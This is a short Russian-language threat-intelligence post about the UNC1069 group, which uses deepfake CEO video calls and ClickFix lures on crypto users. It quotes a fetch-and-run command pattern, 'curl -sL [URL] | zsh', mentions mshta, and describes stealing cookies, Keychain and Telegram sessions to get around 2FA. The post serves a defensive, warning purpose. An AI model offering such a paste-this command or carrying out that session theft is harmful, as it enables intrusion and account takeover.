UNC1069: Deepfake-театр и терминальные эксплойты
Группировка перешла от стандартного фишинга к использованию AI-аватаров реальных CEO прямо на созвонах. Вы заходите на встречу (домен типа zoom-meeting[.]us), видите известного фаундера, слышите его голос, но видео «лагает» из-за якобы плохого соединения.
Вся схема заточена под вектор ClickFix.
Вместо того чтобы кидать подозрительный файл, вас просят «починить», вставив скрипт в терминал. Расчет на психологию: скопировать код кажется безопаснее, чем скачать exe-шник.
Исполнение моментальное. На macOS это классический curl -sL [URL] | zsh, на Windows прилетает mshta.
После ввода команды они не ищут сид-фразы. Они пылесосят активные сессии (Cookies). Это дает прямой вход на биржи (CEX), в админки и SaaS в обход 2FA. Заодно вытягивают Keychain и сессии Telegram (tdata), чтобы масштабировать атаку уже от вашего имени.
Кампания эксплуатирует старый миф о том, что macOS безопасна «из коробки». Если кто-то просит вставить команду в терминал, чтобы пофиксить микрофон - рубите связь. Даже если на экране ваш друг.
Более подробно об этой APT можно прочитать здесь:
https://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering
Post #55
418